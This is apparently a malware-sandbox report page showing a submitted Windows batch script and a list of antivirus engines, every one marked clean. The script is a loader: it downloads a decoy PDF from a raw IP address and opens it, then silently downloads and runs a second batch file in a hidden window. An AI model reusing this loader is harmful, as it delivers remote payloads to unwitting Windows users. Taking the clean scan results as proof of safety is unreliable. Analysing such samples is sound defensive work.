Static | ZeroBOX
No static analysis available.
@echo off
setlocal
:: Define temp directory
set temp_dir=%TEMP%
:: Check if PowerShell is available
where powershell >nul 2>nul
if errorlevel 1 (
echo PowerShell is not available. Please install PowerShell or use another method to download files.
exit
:: Download and run the first file using PowerShell
set file1_url=http://18.181.154.24/rv/file.pdf
set file1_name=%temp_dir%\file.pdf
echo Downloading %file1_url%...
powershell -Command "Invoke-WebRequest -Uri '%file1_url%' -OutFile '%file1_name%'"
if exist "%file1_name%" (
echo File downloaded successfully: %file1_name%
start "" "%file1_name%" :: Use default handler for PDF
) else (
echo Failed to download the first file.
exit
:: Download and run the second file using PowerShell
set file2_url=http://18.181.154.24/rv/file.txt
set file2_name=%temp_dir%\file.bat
echo Downloading %file2_url%...
powershell -Command "Invoke-WebRequest -Uri '%file2_url%' -OutFile '%file2_name%'"
if exist "%file2_name%" (
echo File downloaded successfully: %file2_name%
powershell -Command Start-Process "%file2_name%" -WindowStyle Hidden
) else (
echo Failed to download the second file.
exit
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Clean
CTX Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
huorong Clean
FireEye Clean
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
GData Clean
AVG Clean
Panda Clean
alibabacloud Clean
No IRMA results available.